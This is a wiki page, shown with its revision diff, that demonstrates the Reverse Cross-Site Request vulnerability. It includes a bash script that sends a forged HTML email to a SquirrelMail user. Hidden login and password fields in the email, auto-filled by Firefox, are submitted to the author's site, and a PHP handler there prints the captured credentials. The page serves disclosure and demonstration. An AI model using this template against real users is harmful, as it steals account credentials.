Difference between revisions of "Reverse Cross-Site Request (RCSR) vulnerability"

From YobiWiki
Jump to navigation Jump to search
m
 
m (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)
 
(2 intermediate revisions by the same user not shown)
Line 6: Line 6:
 
We'll do the attack by forging an email to be read under a webmail, here squirrelmail.
 
We'll do the attack by forging an email to be read under a webmail, here squirrelmail.
   
Conditions:
+
===Conditions===
 
* Use Firefox
 
* Use Firefox
 
* Let Firefox remembering the password for your squirrelmail website
 
* Let Firefox remembering the password for your squirrelmail website
Line 12: Line 12:
 
* Ask squirrelmail to display HTML version by default (in your prefs)
 
* Ask squirrelmail to display HTML version by default (in your prefs)
   
Forge email:
+
===Forge email===
 
<br>Warning! in this example the destination form is on my own website but if you try as such this means that I will receive your account infos!
 
<br>Warning! in this example the destination form is on my own website but if you try as such this means that I will receive your account infos!
 
<br>You can e.g. change temporarely your password just for the demo.
 
<br>You can e.g. change temporarely your password just for the demo.
 
<br>If you use my form, note that you will be prompted for my SSL certificate, this is because this is a self-generated ssl certificate, I could have done it without ssl but then your account infos would have flied in clear text on the Net!
 
<br>If you use my form, note that you will be prompted for my SSL certificate, this is because this is a self-generated ssl certificate, I could have done it without ssl but then your account infos would have flied in clear text on the Net!
  +
<source lang=bash>
<pre>
 
 
#!/bin/bash
 
#!/bin/bash
 
TO=your@email.com
 
TO=your@email.com
Line 43: Line 43:
 
</html>
 
</html>
 
EOF
 
EOF
</pre>
+
</source>
  +
===On attacker's site===
On my site, the form handler is as simple as that:
+
On my site, the form handler is as simple as that just to show you I got your data:
<pre>
 
  +
<source lang=php>
 
<?php
 
<?php
 
echo "Your login: ".$_POST['login_username'];
 
echo "Your login: ".$_POST['login_username'];
Line 51: Line 52:
 
echo "<br>Your site: ".$_SERVER['HTTP_REFERER'];
 
echo "<br>Your site: ".$_SERVER['HTTP_REFERER'];
 
?>
 
?>
</pre>
+
</source>

Latest revision as of 21:37, 24 November 2010

Intro

This is a new class of vulnerabilities discovered by Robert Chapin.
Resolution for firefox is in discussion.
It's incredibly easy to setup an attack and much larger than just blogs and forums.

Example

We'll do the attack by forging an email to be read under a webmail, here squirrelmail.

Conditions

  • Use Firefox
  • Let Firefox remembering the password for your squirrelmail website
  • Have only one login to be remembered otherwise ff does not autocomplete the login form but waits for you to begin filling the login form.
  • Ask squirrelmail to display HTML version by default (in your prefs)

Forge email


Warning! in this example the destination form is on my own website but if you try as such this means that I will receive your account infos!
You can e.g. change temporarely your password just for the demo.
If you use my form, note that you will be prompted for my SSL certificate, this is because this is a self-generated ssl certificate, I could have done it without ssl but then your account infos would have flied in clear text on the Net!

#!/bin/bash
TO=your@email.com
mail -s test-sec \
   -a "MIME-Version: 1.0" \
   -a "Content-Type: text/html; charset=ISO-8859-1" \
   -a "Content-Transfer-Encoding: 7bit" \
   $TO << EOF
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
TEST<br>Click on the image.
<form action="https://www.yobi.be/form.php" method="post" target="_blank">
<input type="text" name="login_username" style="display: none;" />
<input type="password" name="secretkey" style="display: none;" />
<input type="hidden" name="js_autodetect_results" value="0" />
<input type="hidden" name="just_logged_in" value="1" />
<input type="image" value="Login" src="https://www.yobi.be/1" style="width: 640px; height: 480px;
border: 1px; position: absolute; top: 0px; left: 0px; display: block;"/>
</form>
</body>
</html>
EOF

On attacker's site

On my site, the form handler is as simple as that just to show you I got your data:

<?php
echo "Your login: ".$_POST['login_username'];
echo "<br>Your password: ".$_POST['secretkey'];
echo "<br>Your site: ".$_SERVER['HTTP_REFERER'];
?>